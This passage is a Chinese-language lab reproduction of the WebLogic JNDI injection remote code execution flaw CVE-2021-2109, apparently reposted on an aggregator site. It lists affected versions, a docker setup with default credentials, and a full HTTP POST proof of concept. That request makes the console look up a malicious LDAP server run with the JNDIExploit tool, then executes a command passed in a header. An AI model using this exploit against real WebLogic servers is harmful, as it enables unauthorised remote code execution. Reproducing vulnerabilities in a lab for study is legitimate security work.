当前位置:首页 > 编程语言 > Weblogic JNDI注入 RCE (CVE-2021-2109) 复现

Weblogic JNDI注入 RCE (CVE-2021-2109) 复现

2021-05-31 14:01

阅读:541

标签:post   xpl   exchange   user   odi   accept   rom   requests   label   

影响范围

Weblogic Server 10.3.6.0.0、12.1.3.0.0、12.2.1.3.0、12.2.1.4.0、14.1.1.0.0

环境搭建

docker pull ismaleiva90/weblogic12

docker run -d -p 49163:7001 -p 49164:7002 -p 49165:5556 ismaleiva90/weblogic12:latest
http://localhost:49163/console

复现

进入环境

user:weblogic
passwd:welcome1

技术图片
抓包 提交POC,get/post方法均可,Url中dap://xx.xx.xx;xx:port

POC:

POST /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.1;72:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1
Host: 192.168.1.72:49163
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
cmd:whoami
Cookie:  ADMINCONSOLESESSION=8xUkHS93pNBdw9iRlb1XOoH5Iy5qm65NmKad54eCEtDI2PErEIXy!-181493417
Connection: close

JNDIExploit

https://github.com/feihong-cs/JNDIExploit
java -jar JNDIExploit-v1.11.jar -i 192.168.1.72

技术图片

得到回显
技术图片
技术图片

Weblogic JNDI注入 RCE (CVE-2021-2109) 复现

标签:post   xpl   exchange   user   odi   accept   rom   requests   label   

原文地址:https://www.cnblogs.com/Stunmaker/p/14644138.html

上一篇:PHP设计模式—备忘录模式

下一篇:JS使用正则匹配字符串去掉多余符号

文章来自:搜素材网编程语言模块,转载请注明文章出处。
文章标题:Weblogic JNDI注入 RCE (CVE-2021-2109) 复现
文章链接:http://soscw.com/index.php/essay/89761.html

评论

亲,登录后才可以留言!

热门文章

推荐文章

最新文章

置顶文章

关于我们 | 版权声明 | 常见问题 | 素材投稿 | 联系我们 | 网站地图 |
搜素材网素材除本站原创外均由用户分享,若发现权利被侵害,请联系及时联系我们,我们会在第一时间进行处理。
特别说明:本站所有资源除本站原创外仅供学习与参考,请勿用于商业用途,如有侵犯您的版权请联系客服服务QQ:点击这里给我发消息
Copyright © 2024 soscw.com 搜素材网素材网版权所有 蜀ICP备18015633号-1